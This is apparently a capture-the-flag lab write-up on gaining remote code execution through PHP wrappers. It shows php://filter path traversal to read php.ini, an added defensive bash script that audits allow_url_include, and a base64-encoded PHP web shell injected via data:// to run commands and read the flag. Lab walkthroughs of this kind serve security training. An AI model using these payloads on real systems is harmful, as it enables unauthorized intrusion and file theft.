PHP Wrappers
Try to gain RCE using one of the PHP wrappers and read the flag at /
Step 1 - Check if allow_url_include is on:
Capture the php.ini file:
curl "http://SERVER_IP:SERVER_PORT/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
Copy the base64 string (W1BIUF0KCjs7Ozs7Ozs7O ...SNIP ... 4dGVuc2lvbj1leHBlY3QK) to a file (curl.txt here).
Look for the allow_url_include setting with the command:
cat curl.txt | base64 -d | grep allow_url_include
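The grep in Step 1 also matches commented-out lines, so its output can mislead. As an added example (not part of the original write-up), this script reports the effective allow_url_include value when auditing a php.ini; it assumes plain "name = value" lines where the last active assignment wins, and the sample file is constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: report the effective value of
# a php.ini directive so commented-out lines cannot mislead a plain grep.
# Assumptions: "name = value" lines, ";" comments, last active assignment wins.

# ini_effective DIRECTIVE FILE -> prints the raw value (nothing if unset)
ini_effective() {
  awk -v key="$1" '
    /^[ \t]*;/ { next }                      # whole-line comment
    {
      line = $0
      sub(/[ \t]*;.*$/, "", line)            # trailing comment
      eq = index(line, "=")
      if (eq == 0) next                      # section header or blank
      name = substr(line, 1, eq - 1)
      val  = substr(line, eq + 1)
      gsub(/^[ \t]+|[ \t]+$/, "", name)
      gsub(/^[ \t]+|[ \t]+$/, "", val)
      if (name == key) last = val            # later lines override earlier
    }
    END { if (last != "") print last }
  ' "$2"
}

# ini_is_on VALUE -> exit 0 if PHP reads VALUE as boolean true
ini_is_on() {
  local v
  v=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
  case "$v" in
    on|true|yes) return 0 ;;
    ''|*[!0-9]*) return 1 ;;                 # off, false, no, none, empty
    *) [ "$v" -ne 0 ] ;;                     # numeric: non-zero is true
  esac
}

# audit_url_include FILE -> prints "on" or "off"
audit_url_include() {
  if ini_is_on "$(ini_effective allow_url_include "$1")"; then echo on; else echo off; fi
}

# Constructed sample: grep would print both lines, only the second is active.
sample=$(mktemp)
cat > "$sample" <<'EOF'
[PHP]
;allow_url_include = On
allow_url_include = Off   ; hardened
allow_url_fopen = On
EOF
echo "allow_url_include is $(audit_url_include "$sample")"
```

Pointed at a server's own php.ini, a result of "on" means the data:// technique in Step 2 would work against any include that takes user input.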

Step 2 - Remote Code Execution:
Base64 encode a PHP web shell:
echo '<?php system($_GET["cmd"]); ?>' | base64
PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
Test the web shell:
curl -s 'http://SERVER_IP:SERVER_PORT/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid

Look for the flag in the / directory:
curl -s 'http://SERVER_IP:SERVER_PORT/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls%20../../../../'

Retrieve the flag:
curl -s 'http://SERVER_IP:SERVER_PORT/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat%20../../../37809e2f8952f06139011994726d9ef1.txt'

And we got the flag!